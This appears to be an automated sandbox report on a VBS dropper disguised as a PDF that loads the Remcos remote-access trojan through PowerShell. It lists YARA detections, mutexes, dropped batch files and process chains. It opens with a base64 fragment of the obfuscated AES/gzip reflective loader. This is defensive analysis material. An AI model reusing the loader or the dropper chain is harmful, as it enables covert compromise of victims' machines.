dmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 15_2_0ABB7538 NtCreateSection,NtMapViewOfSection,NtUnmapViewOfSection,NtMapViewOfSection,

15_2_0ABB7538

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_07B20EE0		15_2_07B20EE0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_07B22BBA		15_2_07B22BBA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_0ABB7538		15_2_0ABB7538
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_07B22C0D		15_2_07B22C0D

Source: Hellas,pdf.vbs

Initial sample: Strings found which are bigger than 50

Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3687
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3687
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3687
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3687
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3687
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3687
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3687
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3687
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3687
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3687			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3687			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3687			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3687			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3687
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3687
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3687
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3687
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3687

Source: 15.2.powershell.exe.8da1288.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 15.2.powershell.exe.8da1288.5.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 15.2.powershell.exe.8da1288.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 15.2.powershell.exe.8da1288.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 15.2.powershell.exe.8da1288.5.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 15.2.powershell.exe.8da1288.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000000F.00000002.1552419093.000000000A0BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000001F.00000002.2512708434.0000000009DFA000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000027.00000002.2774707860.000000000B043000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000015.00000002.1740439060.00000000098E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000002C.00000002.2858524631.000000000841D000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000001F.00000002.2373508321.0000000008C9D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000027.00000002.2882266022.000000000C02D000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000F.00000002.1568471342.000000000A7A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000001A.00000002.2040616405.000000000ADAD000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000F.00000002.1572745372.000000000AB3A000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000001F.00000002.2550254218.000000000A8FD000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000F.00000002.1551424407.0000000008DA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000F.00000002.1552180050.0000000008E79000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000015.00000002.1780758184.000000000ADED000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000001A.00000002.1977944818.000000000914B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: Process Memory Space: powershell.exe PID: 8840, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 8840, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 2184, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 2184, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5520, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 5520, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 2484, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 2484, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 4756, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 4756, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 9020, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 9020, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7908, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: 15.2.powershell.exe.6fdd700.3.raw.unpack, mdzzx.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 15.2.powershell.exe.8d20000.4.raw.unpack, mdzzx.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 15.2.powershell.exe.6f3d6e0.1.raw.unpack, mdzzx.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 15.2.powershell.exe.6a444d8.2.raw.unpack, mdzzx.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 21.2.powershell.exe.689cfe8.1.raw.unpack, mdzzx.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 21.2.powershell.exe.63a3de0.0.raw.unpack, mdzzx.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 26.2.powershell.exe.69bc9a0.2.raw.unpack, mdzzx.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 26.2.powershell.exe.6a5c9c0.1.raw.unpack, mdzzx.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 26.2.powershell.exe.64c3798.0.raw.unpack, mdzzx.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 31.2.powershell.exe.62d7dd8.1.raw.unpack, mdzzx.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 31.2.powershell.exe.57913c0.2.raw.unpack, mdzzx.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 39.2.powershell.exe.6918850.0.raw.unpack, mdzzx.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 39.2.powershell.exe.6918850.0.raw.unpack, mdzzx.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 44.2.powershell.exe.66667c0.0.raw.unpack, mdzzx.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 44.2.powershell.exe.66667c0.0.raw.unpack, mdzzx.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 31.2.powershell.exe.62d7dd8.1.raw.unpack, mdzzx.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 31.2.powershell.exe.62d7dd8.1.raw.unpack, mdzzx.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 15.2.powershell.exe.6fdd700.3.raw.unpack, mdzzx.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 15.2.powershell.exe.6fdd700.3.raw.unpack, mdzzx.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 26.2.powershell.exe.69bc9a0.2.raw.unpack, mdzzx.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 26.2.powershell.exe.69bc9a0.2.raw.unpack, mdzzx.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 15.2.powershell.exe.8d20000.4.raw.unpack, mdzzx.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 15.2.powershell.exe.8d20000.4.raw.unpack, mdzzx.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 15.2.powershell.exe.6a444d8.2.raw.unpack, mdzzx.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 15.2.powershell.exe.6a444d8.2.raw.unpack, mdzzx.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 15.2.powershell.exe.6f3d6e0.1.raw.unpack, mdzzx.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 15.2.powershell.exe.6f3d6e0.1.raw.unpack, mdzzx.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 26.2.powershell.exe.64c3798.0.raw.unpack, mdzzx.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 26.2.powershell.exe.64c3798.0.raw.unpack, mdzzx.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 39.2.powershell.exe.5dd1e38.1.raw.unpack, mdzzx.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 39.2.powershell.exe.5dd1e38.1.raw.unpack, mdzzx.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 44.2.powershell.exe.5b1fda8.3.raw.unpack, mdzzx.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 44.2.powershell.exe.5b1fda8.3.raw.unpack, mdzzx.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 21.2.powershell.exe.63a3de0.0.raw.unpack, mdzzx.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 21.2.powershell.exe.63a3de0.0.raw.unpack, mdzzx.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 49.2.powershell.exe.59004a0.2.raw.unpack, mdzzx.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 49.2.powershell.exe.59004a0.2.raw.unpack, mdzzx.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 31.2.powershell.exe.6377df8.0.raw.unpack, mdzzx.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 31.2.powershell.exe.6377df8.0.raw.unpack, mdzzx.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 49.2.powershell.exe.64e6ed8.1.raw.unpack, mdzzx.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 49.2.powershell.exe.64e6ed8.1.raw.unpack, mdzzx.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 44.2.powershell.exe.67067e0.1.raw.unpack, mdzzx.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 44.2.powershell.exe.67067e0.1.raw.unpack, mdzzx.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 26.2.powershell.exe.6a5c9c0.1.raw.unpack, mdzzx.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 26.2.powershell.exe.6a5c9c0.1.raw.unpack, mdzzx.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 31.2.powershell.exe.57913c0.2.raw.unpack, mdzzx.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 31.2.powershell.exe.57913c0.2.raw.unpack, mdzzx.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 39.2.powershell.exe.69b8870.3.raw.unpack, mdzzx.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 39.2.powershell.exe.69b8870.3.raw.unpack, mdzzx.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 21.2.powershell.exe.689cfe8.1.raw.unpack, mdzzx.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 21.2.powershell.exe.689cfe8.1.raw.unpack, mdzzx.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winVBS@66/46@3/1

Source: C:\Windows\System32\cmd.exe

File created: C:\Users\user\dwm.bat

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7956:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5028:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1852:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2224:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6364:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8700:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8664:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6548:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5760:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8288:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\Rmc-JSVSVI
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4752:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2636:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8744:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6128:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8236:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8796:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:476:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8264:120:WilError_03

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\WordDoc.bat

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\WordDoc.bat" "

Source: unknown

